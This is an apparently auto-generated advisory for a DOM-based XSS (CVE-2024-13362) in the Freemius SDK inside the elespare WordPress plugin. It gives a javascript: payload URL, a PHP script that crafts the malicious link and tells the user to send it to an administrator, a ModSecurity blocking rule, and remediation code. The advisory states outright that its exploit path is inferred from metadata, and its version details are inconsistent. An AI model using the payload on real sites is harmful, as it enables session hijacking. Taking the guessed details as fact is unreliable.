Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : May 10, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (elespare)

Plugin: elespare
Severity: Medium (CVSS 6.1)
CWE: 79
Vulnerable Version: 3.3.2
Patched Version:
Disclosed: April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):
This is a reflected, DOM-based Cross-Site Scripting (XSS) vulnerability in the Freemius SDK (versions up to and including 2.10.1) as bundled in the elespare plugin version 3.3.2. An unauthenticated attacker can inject arbitrary web script via the url parameter. The CVSS score is 6.1 (Medium): network attack vector, no privileges required, user interaction required.

Root Cause: The vulnerability stems from insufficient input validation and output encoding of the url parameter before it is passed to a JavaScript handler. DOM-based XSS occurs entirely client-side: user-controlled input (here a query-string or fragment value) reaches an HTML or script sink (innerHTML, document.write, eval, an href assignment) without being validated or encoded for that context. Based on the CWE-79 classification and the Freemius SDK's architecture (licensing and analytics features shipped with the plugin), the vulnerable code likely reads the url parameter from the page's query string or hash and injects it into the DOM dynamically. Atomic Edge infers this pattern because reflected DOM XSS typically involves reading a GET parameter and writing it directly into the page; no server-side escaping is involved, so server-side filters alone do not address it.

Exploitation: An attacker crafts a malicious URL containing the payload in the url parameter. For example:
/wp-content/plugins/elespare/freemius/assets/js/index.html?url=javascript:alert(document.domain)
The user must click the crafted link. Freemius's JavaScript then reads the url parameter and injects it into the DOM via innerHTML or a similar sink, and the browser executes the script. Since no authentication is required, any user who clicks the link is affected.

Remediation: The patch (version 3.3.4) must validate the url parameter before it is used in DOM manipulation. The fix should check the parameter against an allowlist (only http/https URLs on the site's own origin) and use safe DOM APIs such as textContent or setAttribute rather than HTML-building sinks. Additionally, the server-side escaping functions (esc_js, esc_url) should be applied wherever PHP emits the value into a page or script; they do not cover a value read directly from location in the browser, which is why the client-side check is the primary fix.
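The inferred vulnerable pattern beside a hardened version, as an added example that is not Freemius or elespare code: sanitizeUrl() accepts only http/https URLs on an assumed site origin (https://example.com) and rejects everything else, and renderSafe() reaches the DOM only through setAttribute and textContent.

```javascript
// Added example, not Freemius or elespare code: the page's inferred
// vulnerable pattern beside a hardened version that validates the `url`
// query parameter before any DOM sink sees it. Site origin is assumed.

// Assumed site origin; a deployment would use its own location.origin.
const SITE_ORIGIN = 'https://example.com';

// Inferred vulnerable pattern: the raw query value reaches innerHTML.
function renderUnsafe(container, search) {
  const url = new URLSearchParams(search).get('url') || '';
  container.innerHTML = '<a href="' + url + '">Continue</a>'; // DOM XSS sink
}

// Returns a normalized absolute URL on the site's own origin, or null.
// Rejects every non-http(s) scheme, so javascript:, data: and vbscript:
// values never reach an href; also rejects foreign hosts (open redirect).
function sanitizeUrl(raw, origin = SITE_ORIGIN) {
  if (typeof raw !== 'string' || raw.length === 0 || raw.length > 2048) {
    return null;
  }
  let parsed;
  try {
    parsed = new URL(raw, origin + '/'); // relative paths resolve on-site
  } catch (e) {
    return null; // unparseable input is dropped, never echoed
  }
  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') return null;
  if (parsed.origin !== origin) return null;
  return parsed.href;
}

// Hardened sink: href set through setAttribute, label through textContent,
// so neither the URL nor the label is ever parsed as HTML.
function renderSafe(container, search) {
  const safe = sanitizeUrl(new URLSearchParams(search).get('url'));
  const a = container.ownerDocument.createElement('a');
  a.setAttribute('href', safe === null ? '/' : safe); // fall back to site root
  a.textContent = 'Continue';
  container.replaceChildren(a);
  return safe !== null; // false means the parameter was rejected
}
```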

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser within the WordPress site context. This can lead to session hijacking, credential theft, defacement, or redirection to malicious sites. The attack does not require any privileges, only a click from the targeted user.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity-compatible rule to protect against this particular CVE. It is a two-part chain: the first rule matches requests for the vulnerable Freemius asset path, and the chained rule matches a url query argument that begins with a javascript: scheme.

ModSecurity
# Line-continuation backslashes restored so Apache parses the directive as one rule.
# The chained rule lowercases and trims the argument first, because browsers treat
# the URL scheme case-insensitively and ignore leading whitespace.
SecRule REQUEST_URI "@rx /wp-content/plugins/elespare/freemius/assets/" \
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius Reflected XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_GET:url "@rx ^javascript:" \
    "t:none,t:trim,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC sends a crafted URL to the target and instructs the user to click it.
// Since the vulnerability is DOM-based and requires user interaction,
// the script simulates a malicious link that exploits the elespare plugin's Freemius integration.

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

$payload = 'javascript:alert("CVE-2024-13362")';

// The vulnerable endpoint is likely a Freemius asset file that processes the url parameter.
// Based on the description, the file index.html within Freemius assets reads the url parameter.
$malicious_url = $target_url . '/wp-content/plugins/elespare/freemius/assets/js/index.html?url=' . urlencode($payload);

// Newline escapes restored; "$target_urln" would otherwise reference an undefined variable.
echo "[+] Atomic Edge CVE-2024-13362 PoC\n";
echo "[+] Target: {$target_url}\n";
echo "[+] Crafted malicious URL:\n";
echo $malicious_url . "\n\n";
echo "[+] Send this URL to an administrator or user of the target site.\n";
echo "[+] If the vulnerability exists, clicking the link will execute JavaScript in their browser.\n";
